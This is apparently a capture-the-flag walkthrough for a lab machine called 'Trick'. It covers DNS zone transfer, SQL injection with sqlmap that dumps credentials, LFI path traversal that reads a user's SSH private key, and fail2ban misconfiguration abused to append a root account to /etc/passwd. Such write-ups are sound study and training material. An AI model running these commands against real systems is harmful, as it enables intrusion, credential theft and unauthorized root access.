# Trick

## Nmap

```
sudo nmap 10.10.11.166 -p- -sS -sV      

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open  smtp    Postfix smtpd
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
80/tcp open  http    nginx 1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### DNS

Starting out on DNS we add 10.10.11.166 to our attacking systems secondary DNS servers. Performing a zone transfer with `dig` reveals the sub-domains `root.trick.htb` and `preprod-payroll.trick.htb`.

```
dig AXFR 'trick.htb' @10.10.11.166
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOU8xVQaTBJUqOVxRlzBG%2Fimage.png?alt=media\&token=df190e7d-d08a-4eaa-8478-3a9cf6bb8660)

**Note:** Add these into `/etc/hosts.`

Browsing to <http://preprod-payroll.trick.htb> reveals the following login prompt.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUcikubO7NioZn9DBxw81%2Fimage.png?alt=media\&token=cd5a392d-3d07-455d-9a5a-b80d9f4333da)

**Note:** add to `/etc/hosts`.

Performing directory enumeration with dirseach reveals the `/user.php` page.

```
dirsearch -u http://preprod-payroll.trick.htb -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FTO2UGpm9w98v1vPXonOo%2Fimage.png?alt=media\&token=0b6ce7e6-b85c-4e26-80d0-7030467d280a)

Viewing the page we find the username *Enemigosss.* We find the page buttons are not actionable.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F1zCVlD3WeGy56mmYkNqL%2Fimage.png?alt=media\&token=721a61dd-2b0b-4e9e-958a-05ece471b9b6)

Viewing the page source reveals come code that indicates parameters that we can use.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FryOPJ4z0oRawQPSgtcHF%2Fimage.png?alt=media\&token=6bdc4ec6-486a-437d-8c51-226c9703a98f)

Testing the page parameter we are taken to a new page however, unable to action in any meaningful way further.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlJJLOh5YFP9FekEjC9BS%2Fimage.png?alt=media\&token=4214e3a7-85d6-42c8-b63d-6abadf400091)

the `id=n` parameter could possibly be susceptible to SQL injection so we fire up `sqlmap` and command in the URL with the parameters.

Running through with the `--batch` and `--tables` parameters we are shown the users table on the payroll\_db database.

```
sqlmap -u 'http://preprod-payroll.trick.htb/manage_user.php?id=1' --batch --tables
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FColxV5eilh2s8bDVNozi%2Fimage.png?alt=media\&token=cae22d95-c4ca-4edf-bbae-b49ac0b60386)

We can then dump the contents of the users table.

```
sqlmap -u 'http://preprod-payroll.trick.htb/manage_user.php?id=1' --batch -T users --dump 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FpNSlkDyxL8g0xX4YhJfj%2Fimage.png?alt=media\&token=2af7811f-bdc6-4e78-90b9-b02e28c28252)

which reveals the following credentias credentials: `Enemigosss:SuperGucciRainbowCake`

Going back to the login page on <http://preprod-payroll.trick.htb> we are able to proceed with the given credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FaoAxQ7shKv6U8DUPP83c%2Fimage.png?alt=media\&token=344c3ea8-8f30-4ebe-b232-0a8e336896d2)

We find that none of the pages provide any interesting information so we use wfuzz to fuzz for further pages.

```bash
wfuzz -b 'PHPSESSID=j7d96ocnncnp9pajveb9eqlqsg' -u "http://preprod-payroll.trick.htb/index.php?page=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt --hw 504 -c
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fvs1lqPAFTbDNB184ddMA%2Fimage.png?alt=media\&token=2dfee630-c75f-4fc9-bbf3-c3c83493cc7f)

Finding the page <http://preprod-payroll.trick.htb/index.php?page=site_settings> we are presented with an opportunity for file upload. However, I was not able to get this working. Viewing the requests through a proxy shows our working user does not have permission for file upload.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fp3LY6twGq9h5CBqHxI1L%2Fimage.png?alt=media\&token=bb250da5-6638-4ee1-be43-31f37af37295)

Looking again at the subdomain preprod-payroll we can fuzz the subdomain for other potentials domains where the word "payroll" is fuzzed which identifies "marketing".

```
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://trick.htb" -H "Host: preprod-FUZZ.trick.htb" --hl 83 -v
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F54p2ldR1bX82FHbCVH8a%2Fimage.png?alt=media\&token=e1b885a0-88f5-40a6-8453-df913500c920)

Adding `preprod-marketing.trick.htb` to our hosts file we then browse to the domain and find an additional host.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FQRUsR02Jmo1qFV7JOJhz%2Fimage.png?alt=media\&token=4cc98cd1-a0ee-4d21-b2ab-e9906c054225)

Going through the available pages we find the parameter `/index.php?page=services.htm`l can likely be fuzzed for further pages or maybe even LFI.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F39IQbAARezixsv5sPxgx%2Fimage.png?alt=media\&token=757fd33c-17f5-4045-af7d-949abc9423a6)

Checking for LFI:

```
wfuzz -u "http://preprod-marketing.trick.htb/index.php?page=FUZZ" -w ~/Desktop/lfi_linux.txt --hl 0
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FFw2JVd9F79dRZpck8UZc%2Fimage.png?alt=media\&token=09d7b956-2647-4a3e-851b-730610621a34)

We get various hits for the bypassing to read `/etc/passwd`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FRduVcfHHYPQsIJj1OFOP%2Fimage.png?alt=media\&token=82a83687-0520-4706-8dbe-fef70b299041)

Seeing that the user michael exists on the target system we fuzz for well known files and get a hit for the `id_rsa` ssh key.

```
curl 'http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Frrcjt3Pxcrd66QPOGkmn%2Fimage.png?alt=media\&token=5d39fc22-d356-4ba3-8d6b-03134dda7b4f)

Copying the contents into `id_rsa` and using `chmod` to set the appropriate permissions. We are then able to `SSH` into the target system.

```
sudo chmod 600 id_rsa
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fw0ZtZKuqexCgS9bSz5YB%2Fimage.png?alt=media\&token=c6bea6dd-9317-4423-9ff0-c946e2895464)

Grabbing the `user.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FzZvPiCnsuuMwUm2KvdRV%2Fimage.png?alt=media\&token=5853b2c1-9953-4a98-8d68-837a16c89ac3)

Checking sudo permissions with `sudo -l`. We see we have the ability to restart the `fail2ban` service as root without specifying the root password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FQFTl0XSfEXSARgaxEbu5%2Fimage.png?alt=media\&token=83817c39-788c-4c65-9167-823616ca5595)

Some research into privilege escalation with fail2ban. Having the ability to edit the `iptables-multiport.conf` file presents opportunity for privilege escalation.

{% embed url="<https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7>" %}

The user *michael* has directory permissions over `/etc/fail2ban/action.d` which means we can replace files within the directory with our own files.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmHxKXT3XA3YZ3aHyEekc%2Fimage.png?alt=media\&token=d7679f61-05c7-4b89-af0c-3be74dc1a17d)

First off, copy the current contents of `iptables-multiport.conf` and make appropriate changes. Below we are setting the command to create a new root user with the password Password123.

```bash
echo 'viper:$1$luDZJMtq$4ljcR6cSb41FraIUQIiQx/:0:0:viper:/home/viper:/bin/bash' >> /etc/passwd
```

The command will be executed under "actionstart" which executes the given command for when the service starts.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNsAec18U1muv5z1FBRuS%2Fimage.png?alt=media\&token=f403eb8c-1917-4689-ac12-ac1aeb36caf9)

The following commands then need executing in quick succession as the directory resets often.

```bash
# Delete current iptables-multiport.conf
echo y | rm iptables-multiport.conf

# create new file
touch iptables-multiport.conf

# open editor
nano iptables-multiport.conf
```

Copy the preconfigured `iptables-multiport.conf` we created earlier into the configuration file and save.

```bash
# Restart fail2ban
sudo -u root /etc/init.d/fail2ban restart
```

Wait a short while, check /etc/password and we should see our new user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlavvPz1udcbqbzj0CiR2%2Fimage.png?alt=media\&token=8fefc8e8-5080-4aa1-bc8b-8c5fbb80aaff)

We can then use `su` to switch to our new root user. For some unknown reason during the process of changing user I was moved directly to the root user. No complaints...

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdvDVZDtNcGebz78WeflI%2Fimage.png?alt=media\&token=374f6080-b1fd-4de7-a0b6-b8bd333d4cd9)